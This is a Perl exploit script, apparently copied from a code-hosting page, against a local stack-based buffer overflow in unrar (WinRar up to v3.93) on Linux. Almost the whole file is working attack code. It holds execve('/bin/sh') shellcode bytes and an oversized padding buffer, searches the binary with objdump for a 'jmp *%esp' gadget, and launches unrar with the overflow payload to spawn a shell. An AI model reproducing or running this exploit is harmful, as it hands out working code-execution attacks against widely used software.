59 lines
No EOL
1.2 KiB
Perl
Executable file
59 lines
No EOL
1.2 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
=head1 TITLE
|
|
|
|
Winrar <= v3.93 Local Stack-based Overflow exploit
|
|
|
|
|
|
=head2 DESCRIPTION
|
|
|
|
This script triggers a buffer overflow attack against Unrar, the linux popular version of WinRar extractor.
|
|
It was not developped to bypass non-executing stack patches.
|
|
Have phun
|
|
|
|
=head2 AUTHORS
|
|
|
|
ZadYree ~~ 3LRVS Team - Low Level Languages Reversing Vxing Security
|
|
|
|
|
|
=head2 Tested ON
|
|
|
|
Linux Debian 6. May work on FreeBSD.
|
|
|
|
=head3 THANKS
|
|
|
|
kmkz
|
|
regol
|
|
hellpast
|
|
Hebiko
|
|
m_101
|
|
ZadYree
|
|
|
|
SNCF
|
|
The one who sent me that locked .rar
|
|
=cut
|
|
use 5.010;
|
|
|
|
# Shellcode: execve("/bin/sh") => http://www.shell-storm.org/shellcode/files/shellcode-752.php
|
|
use constant SHELLCODE => "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" .
|
|
"\x73\x68\x68\x2f\x62\x69\x6e\x89" .
|
|
"\xe3\xb0\x0b\xcd\x80";
|
|
use constant BUFF => ('-' . ('3lrvs' x 820));
|
|
##
|
|
|
|
|
|
$pname = "/usr/bin/unrar";
|
|
|
|
die "[-]File $pname does not exist!\012" unless (-e $pname);
|
|
|
|
say "[*]Looking for jmp *%esp gadget...";
|
|
|
|
for my $line(qx{objdump -D $pname | grep "ff e4"}) {
|
|
$esp = "0" . $1, last if ($line =~ m{([a-f0-9]{7}).+jmp\s{4}\*%esp});
|
|
}
|
|
|
|
say '[+]Jump to $esp found! (0x', $esp, ")\012[+]Now exploiting...";
|
|
sleep(1);
|
|
|
|
my @payload = ($pname, (BUFF . pack("V", hex($esp)) . SHELLCODE . "\012"));
|
|
|
|
exec(@payload); |